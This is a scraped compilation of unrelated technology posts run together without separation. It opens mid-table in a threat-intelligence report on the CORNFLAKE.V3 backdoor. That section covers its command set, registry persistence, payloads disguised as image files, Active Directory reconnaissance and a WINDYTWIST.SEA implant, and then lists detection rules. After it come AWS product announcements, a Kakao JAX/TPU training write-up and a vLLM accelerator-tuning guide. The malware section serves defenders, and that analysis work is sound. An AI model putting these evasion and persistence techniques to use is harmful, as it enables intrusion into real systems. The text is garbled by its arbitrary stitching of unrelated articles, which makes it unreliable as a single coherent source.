0
EXE
This decrypted content is saved to a temporary executable file (<rand_8_char>.exe) created in a random directory within the user’s %APPDATA% folder, and executed through PowerShell as a hidden process.
1
DLL
The decrypted content is saved as a <rand_8_char>.png file in a temporary directory within the user’s %APPDATA% folder. Subsequently, rundll32.exe is invoked to execute the downloaded file.
2
JS
This decrypted content is saved as a <rand_8_char>.jpg file in a temporary directory within the user’s %APPDATA% folder. The script attempts to check if Node.js is installed. If Node.js is not found or fails to install from a hardcoded URL (http://nodejs[.]org/dist/v21.7.3/node-v21.7.3-win-x64.zip), an error message is printed. If Node.js is available, the downloaded JavaScript (.jpg) file is executed using node.exe.
3
CMD
This decrypted data is executed as a provided command string via cmd.exe or powershell.exe.
4
ACTIVE
This command reports the active_cnt (stored in the $qRunq global variable) to the C2 server. This likely serves as a heartbeat or activity metric for the implant.
5
AUTORUN
The malware attempts to establish persistence by adding a registry entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points to the script’s PHP binary and its own path.
6
OFF
This command directly calls exit(0), which terminates the PHP script’s execution.
OTHER
If none of the specific commands match, the received data is saved as a .txt file in a temporary directory within the user’s %APPDATA% folder.
The Javascript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the JS command. Other notable changes include the change of the DLL and JS payload file extensions into .png and .jpg to evade detection and the addition of the ACTIVE and AUTORUN commands. However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.
These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.
Executed Payloads
Active Directory Reconnaissance
A cmd.exe reconnaissance payload similar to the one encountered in the Node.js variant was received from the C2 server and executed. The script checks if the machine is part of an Active Directory domain and collects the following information using powershell:
Domain Joined
Total count of computer accounts in AD.
Domain trust relationships.
List of all Domain Controllers.
Members of the “Domain Admins” group.
User accounts configured with a Service Principal Name (SPN).
All local groups and their members
Current User name, SID, local group memberships and security privileges
Not Domain Joined
All local groups and their members
Current User name, SID, local group memberships and security privileges
WINDYTWIST.SEA Backdoor
Following the interaction with its C2 server, a DLL payload (corresponding to command 1) was received, written to disk as C:Users<User>AppDataRoamingShift19434078G0ZrQi.pngand executed using rundll32. This file was a WINDYTWIST.SEA backdoor implant configured with the following C2 servers:
This implant is a C version of the Java WINDYTWIST backdoor, which supports relaying TCP traffic, providing a reverse shell, executing commands, and deleting itself. In previous intrusions, Mandiant observed WINDYTWIST.SEA samples attempting to move laterally in the network of the infected machine.
The following process tree was observed during the infection:
This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor. The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.
To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible. Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.
Acknowledgements
Special thanks to Diana Ion, Yash Gupta, Rufus Brown, Mike Hunhoff, Genwei Jiang, Mon Liclican, Preston Lewis, Steve Sedotto, Elvis Miezitis and Rommel Joven for their valuable contributions to this blog post.
Detection Through Google Security Operations
For detailed guidance on hunting for this activity using the following queries, and for a forum to engage with our security experts, please visit our companion post on theGoogle Cloud Community blog.
Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity discussed in the blog post is detected in Google SecOps under the rule names:
Powershell Executing NodeJS
Powershell Writing To Appdata
Suspicious Clipboard Interaction
NodeJS Reverse Shell Execution
Download to the Windows Public User Directory via PowerShell
Run Utility Spawning Suspicious Process
WSH Startup Folder LNK Creation
Trycloudflare Tunnel Network Connections
SecOps Hunting Queries
The following UDM queries can be used to identify potential compromises within your environment.
Execution of CORNFLAKE.V3 — Node.js
Search for potential compromise activity where PowerShell is used to launch node.exe from %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.
Search for compromise activity where PowerShell is executing php.exe from %AppData% path. This variant is characterized by the use of the -d argument, executing a PHP script without a .php file extension, and passing the argument 1 to the PHP interpreter, indicating covert execution of malicious PHP code.
Search suspicious process activity where cmd.exe or powershell.exe are spawned as child processes from node.exe or php.exe when those executables are located in %AppData%.
Search unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.
Today, AWS announces the general availability of AWS Billing and Cost Management Dashboards, a new feature within AWS Billing and Cost Management that helps you visualize and analyze your AWS spending in one consolidated view. This feature enables you to create customized dashboards that combine data from AWS Cost Explorer and Savings Plans and Reserved Instance coverage and utilization reports. With Billing and Cost Management Dashboards, you can quickly understand your AWS cost patterns and make informed financial decisions for your organization.
Billing and Cost Management Dashboards allows you to create and customize widgets using various widget types including cost widgets, usage widgets, Savings Plans utilization and coverage widgets, and Reserved Instances utilization and coverage widgets. Each widget can be configured with different visualizations, such as line chart, bar chart, stacked bar chart or tables, and you can customize dashboard layouts by adjusting widget sizes and positions. You can share these dashboards across accounts within or outside your organization, enabling FinOps teams to establish standardized cost reporting practices throughout their organization.
AWS Billing and Cost Management Dashboards is available at no additional cost in all AWS commercial Regions, excluding AWS China Regions. To get started with AWS Billing and Cost Management Dashboards, visit the AWS Billing and Cost Management console and select “Dashboards” from the left navigation menu. For more information, see the AWS Billing and Cost Management Dashboards user guide or blog.
AWS Clean Rooms now supports error message configurations for PySpark, enabling companies and their partners to develop and test sophisticated analytics faster in a Clean Rooms collaboration. With this launch, you and your partners can specify how much information appears in error messages for analyses that use PySpark, the Python API for Apache Spark. Code authors can configure a PySpark analysis to return detailed error messages when a PySpark analysis fails, provided that each collaboration member approves the analysis to run on their data. For example, when a code author is testing their code for a marketing attribution model in a clean rooms collaboration, they can enable detailed error messages for faster troubleshooting, reducing time-to-insights from weeks to hours or days.
AWS Clean Rooms helps companies and their partners easily analyze and collaborate on their collective datasets without revealing or copying one another’s underlying data. For more information about the AWS Regions where AWS Clean Rooms is available, see the AWS Regions table. To learn more about collaborating with AWS Clean Rooms, visit AWS Clean Rooms.
On August 5, 2025, AWS announced the availability of two new OpenAI models with open weights in Amazon Bedrock. Today, we’re simplifying access to these foundation models by making them automatically available to all Amazon Bedrock users, eliminating the need to explicitly enable model access. Customers can immediately start using these models through the Amazon Bedrock Console playground or through Amazon Bedrock’s unified API in AWS SDK in the regions where the models are available.
This streamlined access enables customers to quickly begin using OpenAI’s gpt-oss-120b and gpt-oss-20b models without needing to manually activate model access.Soon, we will extend this simplified access approach to other existing non-legacy serverless models in Amazon Bedrock. Going forward, Amazon Bedrock will launch all new serverless foundation models with default access for AWS accounts. Account administrators retain full control over model access through IAM policies and Service Control Policies (SCPs) to restrict model usage as needed.
Amazon Managed Streaming for Apache Kafka (Amazon MSK) now supports Graviton3-based M7g instances for Standard brokers for MSK Provisioned clusters in AWS GovCloud (US-West), AWS GovCloud (US-East), Asia Pacific (Jakarta), Asia Pacific (Melbourne), Asia Pacific (Osaka), Europe (Zurich), Israel (Tel Aviv), and Asia Pacific (Hong Kong) Regions.
Graviton M7g instances for Standard brokers deliver up to 24% compute cost savings and up to 29% higher write and read throughput over comparable MSK clusters running on M5 instances.
You can now generate AI-powered forecasts and visualizations on time-series data that has been indexed into Amazon OpenSearch 3.1+ domains.
Forecasts can be used to enhance various analytics use cases to power insights into trending infrastructure utilization and events, application or business metrics, and more. They can help you anticipate upcoming changes in areas such as business metrics, website traffic, system performance, and more. You can easily get started with this feature by setting up forecasts within OpenSearch dashboards or the OpenSearch UI. No data science or AI expertise is required.
AI-powered forecasts are available in all Amazon OpenSearch Service regions that support OpenSearch 3.1 domains. Learn more from the documentation.
When your messaging platform serves 49 million people – 93% of South Korea’s population – every technical decision carries enormous weight. The engineering team at Kakao faced exactly this challenge when their existing infrastructure hit critical limitations. Their solution? A strategic shift to Google Cloud TPUs using the JAX framework that not only solved their immediate scalability needs but opened new possibilities for advanced AI model development.
Kakao’s approach provides a compelling example of leveraging the high-performance array computing framework JAX for AI model development at scale. While their primary training environment was GPU-based, the team made a strategic decision to adopt the JAX stack on Google Cloud TPUs to optimize for cost and efficiency.
This work laid the groundwork for the development of their proprietary Kanana model family, and several Kanana models — including Kanana-MoE — have recently been released as open source on Hugging Face Hub.
In this post, Minho Ryu and Nayeon Kim detail Kakao’s technical journey. They cover their specific implementation details, from adapting the JAX large language model framework and MaxText for custom data pipelines to their work on mixture-of-experts (MoE) model training.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e613cbe05b0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Kakao’s journey by Minho and Nayeon:
As engineers at Kakao, we develop models that serve KakaoTalk, a platform supporting services that extend far beyond text. Our rich ecosystem includes chat with over 700,000 images and stickers (emojis), voice and video calls, finance, and navigation.
KakaoTalk’s massive scale and complexity demand that our language models are not only highly efficient but also excel at understanding the Korean language and are flexible enough for diverse applications. These real-world product requirements directly influenced our technical decisions and our need for a customizable training framework.
Our journey with JAX began at an important inflection point. Our existing GPU-based infrastructure was reaching power and budget capacity constraints. We had two options: expand our GPU infrastructure and maintain our existing codebase, or adopt Cloud TPUs, which offered cost-performance advantages while requiring adoption of a new toolchain. We chose Cloud TPUs, viewing the short-term investment as worthwhile for long-term cost-performance benefits, and built our stack on JAX.
We use XPK for Kubernetes cluster management, which simplifies job creation and management on GKE without requiring Kubernetes expertise. For the data pipeline, we adopted Grain due to its deterministic behavior, which is essential for the stability of long-running AI model training jobs.
We focused on adapting the MaxText framework to fit our specific research and compatibility needs. We made two key customizations to the pipeline:
1. Multi-source data blending: When we began exploring training with MaxText, it assumed a single, pre-mixed corpus. Our research requires blending different data sources — such as web text, code, and math — with specific, dynamically-adjusted weights during different training phases. To achieve this flexibility without reprocessing terabytes of data for each experiment, we implemented a solution using Grain’s mix function. This approach allows us to define blending ratios in our configuration, providing the adaptability essential for our iterative research process. We filed a PR for this feature to be supported in MaxText natively, and it has been incorporated here since.
2. Token Processing for Efficiency and Compatibility: To maintain compatibility with our existing Megatron-LM pipeline and improve efficiency, we modified MaxText’s token processing logic. Our data preparation method constructs each training sequence by appending the first token of the subsequent sequence. This creates overlapping, continuous sequences, ensuring that no information is lost at the boundaries and maximizing data utilization.
To validate our new TPU-based workflow, we trained two models. First, we trained the Kanana 2.1 billion parameter model from scratch, and the results demonstrated that our MaxText implementation achieved performance comparable to our existing GPU-based Megatron-LM pipeline at each stage. Second, we performed depth upscaling with continued pre-training from our existing 8B model to a 9.8B architecture. Both approaches succeeded and showed consistent improvements across various benchmarks, confirming that the results on GPU were effectively reproduced on TPU.
Advancing our approach: Training Mixture-of-Experts (MoE) models with MaxText
With the core pipeline validated, we began experimenting with more advanced architectures, specifically MoE models, to build inference-efficient models that maintain strong performance. Our objectives were to explore upcycling an existing dense model into an MoE structure and to evaluate the suitability of the TPU and MaxText stack for this task.
For the experiment, we upcycled our 2.1B dense model into a 13.4B parameter (2.3B active) MoE architecture with 64 experts and 8 active experts per token. We trained this model on the exact same dataset as the original dense model to isolate the impact of the architectural change. The training was performed on v5e TPUs using MaxText with Fully Sharded Data Parallelism (FSDP).
The implementation process was straightforward. We found that MaxText’s flexible design, built on Flax, Optax, and Orbax, was well-suited for the wide range of ablations required for MoE research. Specifically:
Integrated Kernels:Megablocks MoE kernels which support optimized MoE features like Group GEMM were already integrated into JAX.
Combining Schedules: We used the optax.join_schedules function to combine multiple learning rate schedules (e.g. warmup, constant, and annealing) into a single, custom schedule for our training run. This ability to combine different schedules is very useful to experiment with different training strategies.
Code Customization: We needed to enable the load balancing loss for our sparse matmul implementation. This required inserting a single line of code in the permute function within the MoE block of MaxText to calculate the loss directly from the router logits.
The results showed performance improvements, particularly in code and math benchmarks, suggesting domain specialization among the experts.
Performance Evaluation
This met our objectives and further demonstrated the JAX stack’s utility for advanced model development. We are now extending this work by experimenting with shared experts and replacing initial MoE layers with dense layers, modifications which are simple to implement within the MaxText framework.
Performance improvements and key takeaways
During our work, we gained early access to Trillium TPUs. We managed the transition from v5e by changing a few parameters in our XPK cluster and workload configurations. We observed an immediate and substantial throughput increase of 2.7x across our models, along with improved cost-performance efficiency.
Based on our experience, the JAX stack on TPUs provides a comprehensive and efficient environment for AI model development. The key advantages for our team include:
Performance and scalability: The JAX and XLA combination provides just-in-time compilation, and MaxText is optimized for large-scale parallel computing with support for paradigms like SPMD and FSDP.
Customizability and control: The codebase, being pure Python and built on libraries like Flax, Optax, and Orbax is intuitive and easy to modify. This allows us to implement custom data pipelines, training strategies, and novel architectures with minimal overhead.
Rapid feature adoption: The MaxText framework is updated quickly with features from new state-of-the-art models, allowing us to stay current with our research.
These strengths have made the JAX stack a powerful and flexible foundation for our work in training large language models at Kakao.
Build your Language Models with the JAX Ecosystem:
Kakao’s journey demonstrates how the JAX ecosystem’s modular design — including MaxText, Flax, Optax, and Orbax — enables the customization required for both production pipelines and advanced research, from tailored data blending to rapid experimentation with MoE architectures.
Our sincere thanks to Minho, Nayeon and their team for sharing their insightful engineering work. We look forward to seeing how they and other leading enterprises worldwide continue to use the JAX ecosystem to build the next generation of powerful and efficient language models.
Additional contributors include Hossein Sarshar and Ashish Narasimham.
Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.
This guide provides a bottoms-up approach to determining the best accelerator for your use case and optimizing your vLLM’s configuration to achieve the best and most cost effective results possible.
Note: This guide assumes that you are familiar with GPUs, TPUs, vLLM, and the underlying features that make it such an effective serving framework.
Choosing the right accelerator can feel like an intimidating process because each inference use case is unique. There is no a priori ideal set up from a cost/performance perspective; we can’t say model X should always be run on accelerator Y.
The following considerations need to be taken into account to best determine how to proceed:
What model are you using?
Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.
What is the precision of the model you’re using?
We will use bfloat16 (BF16).
Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.
Workload characteristics: How many requests/second are you expecting?
We are targeting support for 100 requests/second.
What is the average sequence length per request?
Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.
What is the maximum total sequence length we will need to be able to handle?
Let’s say in this case it is 2000 total tokens
What is the GPU Utilization you’ll be using?
The gpu_memory_utilization parameter in vLLM controls how much of the GPU’s VRAM is pre-allocated for the KV cache (given the allocated memory for the model weights). By default, this is 90% in vLLM, but we generally want to set this as high as possible to optimize performance without causing OOM issues – which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).
What is your prefix cache rate?
This will be determined from application logs, but we’ll estimate 50% for our calculations.
Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.
What is your latency requirement?
The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.
Selecting Accelerators (GPU/TPU)
We live in a world of resource scarcity! What does this mean for your use case? It means that of course you could probably get the best possible latency and throughput by using the most up to date hardware – but as an engineer it makes no sense to do this when you can achieve your requirements at a better price/performance point.
We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.
The following are examples of accelerators that can be used for our workloads, as we will see in the following Calculate Memory Requirements section.
The following options have different Tensor Parallelism (TP) configurations required depending on the total VRAM. Please see the next section for an explanation of Tensor Parallelism.
GPU Options
L4 GPUs
g2-standard-48 instance provides 4xL4 GPUs with 96 GB of GDDR6
TP = 4
A100 GPUs
a2-ultragpu-1g instance provides 1xA100 80GB GPU of HBM
TP = 1
H100 GPUs
a3-highgpu-1g instances provides 1xH100 80GB GPU of HBM
TP = 1
TPU Options
TPU v5e (16 GB of HBM per chip)
v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8
TPU v6e aka Trillium (32 GB of HBM per chip)
v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4
Calculate Memory Requirements
We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory from our model weights, activations, and overhead & the KV Cache memory.
model_weight is equal to the number of parameters x a constant depending on parameter data type/precision
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine
A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.
In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.
Is Tensor Parallelism Required?
In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?
Very quickly – what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of breaking apart a large model across multiple accelerators (GPU/TPU) so that the model can actually fit on the hardware we need. See here for more information.
vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.
Note: Tensor parallelism is required for TPU’s because of the particular size of this model. v5e and v6e have 16 GB and 32 GB of HBM respectively and mentioned above, so multiple chips are required to support the model size. In this guide, v6e-4 does pay a slight performance penalty for this communication overhead while our 1xH100 instance will not.
Benchmarking, Tuning and Finalizing Your vLLM Configuration
Now that you have your short list of accelerator candidates (4xL4, 1xA100-80GB, 1xH100-80GB, TPU v5e-8, TPU v6e-4), it is time to see the best level of performance we can across each potential setup. We will only overview the H100 and Trillium (v6e) benchmarking & tuning in this section – but the process would be nearly identical for the other accelerators:
Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results
H100 80GB
In your project, open the Cloud Shell and enter the following command to launch an a3-highgpu-1g instance. Be sure to update your project ID accordingly and select a zone that supports the a3-highgpu-1g machine type for which you have quota.
Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail – if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:
In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh which we will need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.
code_block
<ListValue: [StructValue([(‘code’, ‘# navigate to correct directoryrncd benchmarks/auto_tunernrn# update the auto_tune.sh script – user your preferred script editorrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af46bebe0>)])]>
In the auto_tune.sh script, you will need to make the following updates:
Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.
Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow up server resulting in what appears to be a hang. If either happens, edit the auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than beginning at 0.98.
Troubleshooting Note: By default, profiling is currently being passed to the benchmarking_server.py script. In some cases this may cause the process to hang if the GPU profiler is not capable of handling the large number of requests for that specific model. You can confirm this by reviewing the logs for the current run; if the logs include the following line with an indefinite hang afterwards, you’ve run into this problem:
code_block
<ListValue: [StructValue([(‘code’, ‘INFO 08-13 09:15:58 [api_server.py:1170] Stopping profiler…rn# Extensive wait time with only a couple additional logs’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af02fc8e0>)])]>
If that is the case, simply remove the –profile flag from the benchmarking_server.py calls in the auto_tune.sh script under the run_benchmark() function:
code_block
<ListValue: [StructValue([(‘code’, ‘# REMOVE PROFILE FLAG IF HANG OCCURSrnpython3 benchmarks/benchmark_serving.py \rn –backend vllm \rn –model $MODEL \rn –dataset-name random \rn –random-input-len $adjusted_input_len \rn –random-output-len $OUTPUT_LEN \rn –ignore-eos \rn –disable-tqdm \rn –request-rate inf \rn –percentile-metrics ttft,tpot,itl,e2el \rn –goodput e2el:$MAX_LATENCY_ALLOWED_MS \rn –num-prompts 1000 \rn –random-prefix-len $prefix_len \rn –port 8004 \rn –profile &> “$bm_log” # Remove this flag, making sure to keep the &> “$bm_log” # on the argument above’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af02fc400>)])]>
Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.
A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.
In our results.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and then we can take a closer look at that run:
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 6
This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.
e2el: 7612.31
This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.
throughput: 4.17
This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.
TPU v6e (aka Trillium)
Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute our benchmarking script for GPU and TPU.
First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.
<ListValue: [StructValue([(‘code’, ‘# Monitor creationrngcloud compute tpus queued-resources list –zone $ZONE –project $PROJECT’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af02fcb50>)])]>
Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.
SSH directly into the instance with the following command:
Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with the H100.
code_block
<ListValue: [StructValue([(‘code’, ‘# Head to main working directoryrncd benchmarks/auto_tune/rnrn# install required libraryrnapt-get install bcrnrn# Provide HF_TOKENrnexport HF_TOKEN=XXXXXXXXXXXXXXXXXXXXXrnrn# update auto_tune.sh with your preferred script editor and launch auto_tunerrnnano auto_tune.sh’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af592f1c0>)])]>
We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:
As our auto_tune.sh executes we determine the largest possible gpu_utilization value our server can run on and then cycle through the different num_batched_tokens parameters to determine which is most efficient.
Troubleshooting Note: It can take a longer amount of time to start up a vLLM engine on TPU compared to GPU due to a series of compilation steps that are required. In some cases, this can go longer than 10 minutes – and when that occurs the auto_tune.sh script may kill the process. If this happens, update the start_server() function such that the for loop sleeps for 30 seconds rather than 10 seconds as shown here:
code_block
<ListValue: [StructValue([(‘code’, ‘start_server() {rnrn…rnrn for i in {1..60}; do rn RESPONSE=$(curl -s -X GET “http://0.0.0.0:8004/health” -w “%{http_code}” -o /dev/stdout)rn STATUS_CODE=$(echo “$RESPONSE” | tail -n 1) rn if [[ “$STATUS_CODE” -eq 200 ]]; thenrn server_started=1rn breakrn elsern sleep 10 # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONGrn firn donern if (( ! server_started )); thenrn echo “server did not start within 10 minutes. Please check server log at $vllm_log”.rn return 1rn elsern return 0rn firn}’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e5af7d14940>)])]>
The outputs are printed as our program executes and we can also find them in log files at $BASE/auto-benchmark/TAG. We can see in these logs that our current configurations are still able to achieve our latency requirements.
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 9
This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.
e2el: 8423.40
This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.
throughput: 5.63
This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.
Calculating Performance-Cost Ratio
Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.
We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the H100 GPU and the TPU v6e.
NVIDIA H100 x 80GB (a3-highgpu-1g)
Measured Throughput: The benchmark showed a single H100 vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is:
Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for an a3-highgpu-1g machine type in us-central1 is approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
Note: We are choosing Spot instance pricing for the simple cost figures, this would not be a typical provisioning pattern for this type of workload.
Google Cloud TPU v6e (v6e-4)
Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster:
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.
Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:
18 instances × 4 chips x $0.56/hr = $40.32/hr
Conclusion: The Most Cost-Effective Choice
Let’s summarize our findings in a table to make the comparison clear.
Metric
H100 (a3-highgpu-1g)
TPU (v6e-4)
Throughput per Instance
4.17 req/s
5.63 req/s
Instances Needed (100 req/s)
24
18
Spot Instance Cost Per Hour
$2.25 / hour
$0.56 x 4 chips = $2.24 / hour
Spot Cost Total
$54.00 / hour
$40.32 / hour
Total Monthly Cost (730h)
~ $39,400
~ $29,400
The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.
Not only does the v6e-4 instance provide higher throughput than the a3-highgpu-1g instance, but it does so at a significantly reduced cost. This translates to massive savings at higher scales.
Looking at the performance-per-dollar, the advantage is clear:
H100: 4.17 req/s ÷ $54.00/hr ≈ 0.08 req/s per dollar-hour
The v6e-4 configuration delivers almost twice the performance for every dollar spent, making it the superior, efficient choice for deploying this workload.
Final Reminder
This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep in mind the following sizing these workloads:
If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – H100 could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example – perhaps if we searched a larger space we may have found a configuration with even greater cost savings potential .
Additional Resources
The following is a collection of additional resources to help you complete the guide and better understand the concepts described.
Amazon Connect now supports multi-user web, in-app and video calling, allowing multiple users to join the same session with an agent through a web browser or mobile application. Contact center agents can dynamically add participants during a live call or multiple participants can join a scheduled session with the same agent. Participants can engage in audio, video, and screen sharing for a fully collaborative experience.
This capability helps organizations support scenarios such as joint financial planning between spouses, partners and advisors, family medical consultations, or conversations that involve legal representatives, translators, or subject matter experts. With this capability, you can enable a rich, inclusive interaction across stakeholders in a single session, reducing friction and improving the quality of support for complex engagements.
These new features are available in all AWS regions where Amazon Connect is offered. To learn more, visit our product page or refer to our Admin Guide.
Amazon Web Services (AWS) announces the availability of high performance Storage Optimized Amazon EC2 I7i instances in the AWS Europe (Frankfurt, London), Asia Pacific (Malaysia, Sydney, Tokyo) regions. Powered by 5th generation Intel Xeon Scalable processors with an all-core turbo frequency of 3.2 GHz, these new instances deliver up to 23% better compute performance and more than 10% better price performance over previous generation I4i instances. Powered by 3rd generation AWS Nitro SSDs, I7i instances offer up to 45TB of NVMe storage with up to 50% better real-time storage performance, up to 50% lower storage I/O latency, and up to 60% lower storage I/O latency variability compared to I4i instances.
I7i instances offer the best compute and storage performance for x86-based storage optimized instances in Amazon EC2, ideal for I/O intensive and latency-sensitive workloads that demand very high random IOPS performance with real-time latency to access the small to medium size datasets (multi-TBs). Additionally, torn write prevention feature support up to 16KB block sizes, enabling customers to eliminate database performance bottlenecks.
I7i instances are available in eleven sizes – nine virtual sizes up to 48xlarge and two bare metal sizes – delivering up to 100Gbps of network bandwidth and 60Gbps of Amazon Elastic Block Store (EBS) bandwidth. To learn more, visit the I7i instances page.
